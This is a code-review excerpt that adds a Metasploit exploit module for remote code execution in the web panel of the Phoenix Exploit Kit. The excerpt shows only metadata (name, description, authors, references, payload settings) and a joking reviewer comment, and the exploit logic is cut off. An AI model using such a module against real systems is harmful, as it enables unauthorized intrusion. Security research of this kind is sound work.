modules/exploits/multi/http/phoenix_exec.rb

```diff
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Phoenix Exploit Kit Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
+        Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
+        presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
+        then silently installs malware.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'CrashBandicot @DosPerl', #initial discovery
+          'Jay Turla <@shipcod3>', #msf module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '40047' ],
+          [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
+          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 200,
+          'BadChars' => '',
```

Comment:
Dude, you better not be confusing me with @wchen-r7. You were looking for me, too. :P